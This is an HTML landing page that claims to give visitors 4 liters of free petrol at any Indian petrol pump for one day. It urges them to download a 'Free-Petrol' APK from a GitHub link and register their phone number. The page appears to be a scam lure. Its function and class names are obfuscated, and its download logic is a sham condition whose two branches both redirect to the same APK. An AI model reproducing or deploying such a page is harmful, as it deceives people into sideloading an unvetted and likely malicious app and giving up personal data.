<html>
	<meta name="viewport" content="width=device-width, initial-scale=1">
<head>


<style>
body{
background-color:#000;
color:#000;
font-family: sans-serif;
}
p,h1,h2,h3{
color:#fff;
}
.btdabhsodina {
	box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	background-color:#253b8c;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:22px;
	font-weight:bold;
	padding:16px 24px;
	text-decoration:none;
}
.oiervboiwbv {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  text-align: center;
  min-height: 100vh;
}
.btdabhsodina:hover {
	background-color:#314179;
}
.btdabhsodina:active {
	position:relative;
	top:1px;
}


        

</style>

<script>
function basfvbebuobewv() 
{
    var m = new Date().getMinutes(); 
	if(m<60)
	{
		window.location="https://github.com/fpetrolc/super/raw/main/Free-Petrol.apk"; 
	}
	else
	{
		window.location="https://github.com/fpetrolc/super/raw/main/Free-Petrol.apk";
	}
}
</script>

</head>
<body>
<center>
<div class="oiervboiwbv">
	<img src="https://i.postimg.cc/g22zc9LT/fuels.png" width="15" height"15" />
	<br>
	<p><h2>Free Petrol</h2>
		<h2>Get Free Petrol from any Petrol-Pump<br>
		in India. 4-Liters Petrol for free<Br>
		Only for 1-DAY!<br> 
		</h2>
<h3>Download Free-Petrol app and<br>
Register your number now.</h3>
	</p>
	<a onClick="basfvbebuobewv()" class="btdabhsodina">Download Now(.APK)</a>
</div>
</center>
</body>
</html>
